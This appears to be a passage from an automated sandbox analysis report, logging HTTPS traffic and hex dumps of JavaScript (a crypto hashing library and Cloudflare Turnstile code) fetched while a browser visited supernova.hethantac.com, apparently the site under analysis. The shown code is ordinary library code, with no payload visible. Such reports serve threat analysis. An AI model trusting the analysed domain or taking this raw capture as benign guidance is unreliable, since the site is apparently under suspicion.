                                                                                                                                          Data Ascii: ;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a
                                                                                                                                          Data Ascii: er,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
                                                                                                                                          Data Ascii: charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNO
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68
                                                                                                                                          Data Ascii: (a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=th
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c
                                                                                                                                          Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.1655125184.28.90.27443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:25 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                          2024-11-18 05:47:26 UTC515INHTTP/1.1 200 OK
                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                          X-CID: 11
                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                          Cache-Control: public, max-age=212240
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:25 GMT
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          X-CID: 2
                                                                                                                                          2024-11-18 05:47:26 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.1655126104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:26 UTC383OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:26 UTC471INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:26 GMT
                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                          Content-Length: 47672
                                                                                                                                          Connection: close
                                                                                                                                          accept-ranges: bytes
                                                                                                                                          last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa715e3cddaf-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                                                          Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,l=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 66 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 66 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 66 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 66 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 66 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 66 3d 5b 66 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                                                                                          Data Ascii: ])}}function u(f){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,f[0]&&(n=0)),n;)try{if(o=1,c&&(l=f[0]&2?c.return:f[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,f[1])).done)return l;switch(c=0,l&&(f=[f[0]&2,l.val
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e
                                                                                                                                          Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVIN
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22
                                                                                                                                          Data Ascii: S_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){return M(["auto","dark"
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 50 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 72 72 3d 38 65 33 2c
                                                                                                                                          Data Ascii: ekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",P="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recaptcha-response",rr=8e3,
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 3f 4d 72 28 7b 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3a 75 2c 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 3a 67 2c 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 3a 63 7d 29 3a 63 26 26 67 3f 22 35 32 30 70 78 22 3a 63 26 26 75 3f 22 35 30 30 70 78 22 3a 63 3f 22 34 38 30 70 78 22 3a 67 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4d 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72
                                                                                                                                          Data Ascii: ?Mr({isModeratelyVerbose:u,isVerboseLanguage:g,isSmallerFeedback:c}):c&&g?"520px":c&&u?"500px":c?"480px":g?"580px":"570px"},Mr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 74 79 70 65 4f 66 28 6e 29 7d 2c 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 72 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 6c 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72
                                                                                                                                          Data Ascii: typeOf(n)},ce(e)}function lr(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function qe(e){var r=typeof Map=="function"?new Map:void 0;return qe=function(o){if(o===null||!lr(o))return o;if(typeof o!="function")throw new TypeError("Super
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 56 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e
                                                                                                                                          Data Ascii: urn r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(V(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsyn
                                                                                                                                          2024-11-18 05:47:26 UTC1369INData Raw: 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6f
                                                                                                                                          Data Ascii: edback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.top="0px",E.style.o


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.1655127104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:26 UTC806OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                          Referer: https://supernova.hethantac.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:26 UTC1362INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 26447
                                                                                                                                          Connection: close
                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                          cross-origin-embedder-policy: require-corp
                                                                                                                                          cross-origin-opener-policy: same-origin
                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                          origin-agent-cluster: ?1
                                                                                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                          referrer-policy: same-origin
                                                                                                                                          document-policy: js-profiling
